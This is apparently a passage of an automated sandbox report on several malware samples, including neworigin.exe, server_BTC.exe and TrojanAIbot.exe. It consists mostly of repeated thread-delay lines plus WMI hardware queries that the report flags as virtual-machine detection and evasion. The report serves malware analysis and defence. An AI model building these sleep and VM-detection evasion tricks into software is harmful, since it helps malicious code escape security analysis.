Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512 Thread sleep time: -1199202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99757s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99528s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -99091s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98764s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98545s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -98210s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97967s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97611s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97483s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97372s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -97045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96826s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96716s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96608s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96498s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96389s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96280s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -96061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95951s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95842s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95733s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95620s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95514s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95405s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95295s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95165s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -95027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94420s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94311s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -94092s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -93983s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824 Thread sleep time: -93872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6096 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 372 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 4_2_02E45908
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99792 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99227 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99027 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98915 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98788 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98667 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98560 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98454 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98310 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98167 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97929 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97796 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97680 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97466 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97349 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97213 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97089 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96966 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96808 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96390 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96268 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96144 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96020 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95893 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95653 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95542 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95430 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95320 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95200 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95087 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94968 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94853 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94743 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94634 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94495 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94377 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94244 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94113 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93977 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93660 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93392 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93166 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99853 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99688 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99825
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99378
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98963
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98847
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98718
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98603
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98484
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98353
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98220
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98089
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97956
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97754
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97499
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97358
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97238
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97100
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96991
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96789
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96199
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95844
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95705
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95481
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95325
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95156
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94986
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94810
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94636
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94311
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94191
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94042
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93915
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99852
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99690
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99555
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99394
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99226
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99059
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98628
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98223
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98056
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97817
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97245
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97005
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96861
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96702
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96591
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96480
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96263
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96151
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96032
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95904
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95794
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95685
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95576
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95467
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95357
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95248
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95139
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95019
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94899
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94639
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94495
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94283
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94154
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94044
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93931
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93825
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93717
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93607
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199422
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199312
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199202
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99873
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99757
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99528
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99420
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99310
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99201
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99091
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98983
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98873
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98764
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98654
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98545
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98436
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98327
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98210
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97967
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97824
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97611
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97483
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97372
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97260
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97153
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97045
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96936
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96826
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96716
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96608
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96389
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96280
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96170
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96061
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95951
